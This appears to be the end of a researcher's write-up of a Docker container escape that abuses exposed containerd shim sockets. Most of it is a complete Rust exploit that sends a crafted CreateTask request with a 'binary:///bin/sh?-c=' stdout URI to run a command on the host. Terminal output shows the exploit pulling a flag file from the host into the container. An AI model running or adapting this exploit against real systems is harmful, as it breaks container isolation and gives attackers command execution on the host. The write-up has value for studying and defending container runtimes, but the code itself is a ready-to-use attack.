Failed to create task: RpcStatus(Status { code: UNKNOWN, message: "OCI runtime create failed: runc create failed: cannot allocate tty if runc will detach without setting console socket", details: [], special_fields: SpecialFields { unknown_fields: UnknownFields { fields: None }, cached_size: CachedSize { size: 0 } } })

Setting the terminal option to true in the request fixes this: it is then not treated as a detach, so no console socket needs to be created.

Here I use docker cp on the host to copy /flag into the container as the proof. The exp:

rust

use std::{fs, path::Path};

use containerd_shim_protos::{
    api::{CreateTaskRequest, CreateTaskResponse},
    ttrpc::context,
    Client, TaskClient,
};

fn find_shim_sockets() -> Vec<String> {
    fs::read_dir("/run/containerd/s/")
        .expect("Failed to read /run/containerd/s/")
        .filter_map(|entry| entry.ok())
        .map(|entry| entry.path().to_string_lossy().to_string())
        .collect()
}

fn get_container_id() -> String {
    let cgroup = fs::read_to_string("/proc/1/cgroup").expect("Failed to read /proc/1/cgroup");
    for line in cgroup.lines() {
        if line.contains("docker") {
            let parts: Vec<&str> = line.split('/').collect();
            return parts
                .last()
                .expect("Failed to get last part of cgroup line")
                .to_string();
        }
    }
    panic!("Failed to find container id in /proc/1/cgroup: {}", cgroup);
}

fn get_overlayfs() -> String {
    fs::read_to_string("/etc/mtab")
        .expect("Failed to read /etc/mtab")
        .lines()
        .next()
        .expect("Failed to get first line of /etc/mtab")
        .split(',')
        .find(|part| part.contains("workdir="))
        .expect("Failed to find overlayfs workdir")
        .split_whitespace()
        .next()
        .expect("Failed to get overlayfs workdir")
        .split('=')
        .last()
        .expect("Failed to get overlayfs workdir")
        .replace("work", "merged")
}

fn get_overlay_id() -> String {
    let overlay_path = get_overlayfs();
    overlay_path
        .split('/')
        .nth_back(1)
        .expect("Failed to get last part of overlayfs path")
        .to_string()
}

fn main() {
    for socket in find_shim_sockets() {
        let sockaddr = format!("unix://{socket}");
        println!("connecting to {}", sockaddr);
        let client = Client::connect(&sockaddr).expect("Failed to connect to shim");
        let task = TaskClient::new(client);
        let create_resp = create_task_request(&task);
        println!("created task: {:#?}", create_resp);
    }
}

fn set_bundle<P: AsRef<Path>, Q: AsRef<Path>>(overlayfs_path: P, inner_path: Q) -> String {
    let config_template = include_str!("config.json");
    let config = config_template
        .replace("{{OVERLAY_ID}}", &get_overlay_id())
        .replace("{{CONTAINER_ID}}", &get_container_id());
    let config_path = Path::new("/").join(&inner_path).join("config.json");
    fs::write(&config_path, config)
        .unwrap_or_else(|_| panic!("Failed to write {}", config_path.display()));
    let bundle_path = overlayfs_path.as_ref().join(inner_path);
    bundle_path.to_string_lossy().into_owned()
}

fn create_task_request(task: &TaskClient) -> CreateTaskResponse {
    let mut create_req = CreateTaskRequest::new();
    create_req.set_id("PwnedByWings".to_string());
    create_req.set_terminal(true);
    let bundle_path = set_bundle(get_overlayfs(), "tmp/");
    create_req.set_bundle(bundle_path);
    let command = format!("docker cp /flag {}:/", get_container_id());
    let command = command.replace(" ", "%20");
    let payload = format!("binary:///bin/sh?-c={command}");
    create_req.set_stdout(payload);
    task.create(context::with_timeout(0), &create_req)
        .expect("Failed to create task")
}

The result:

text

/ # ls
bin    etc    home   media  opt    root   sbin   sys    usr
dev    exp    lib    mnt    proc   run    srv    tmp    var
/ # ./exp
connecting to unix:///run/containerd/s/88552ed7ac5fb857627ffeabe8b98d2197fda3d27779ff5cc0febdb6d728dc17
created task: CreateTaskResponse {
    pid: 660,
    special_fields: SpecialFields {
        unknown_fields: UnknownFields {
            fields: None,
        },
        cached_size: CachedSize {
            size: 0,
        },
    },
}
/ # ls
bin    etc    flag   lib    mnt    proc   run    srv    tmp    var
dev    exp    home   media  opt    root   sbin   sys    usr
/ # cat flag
flag{escaped}

(Half a year for just this much; shelving it here for now.)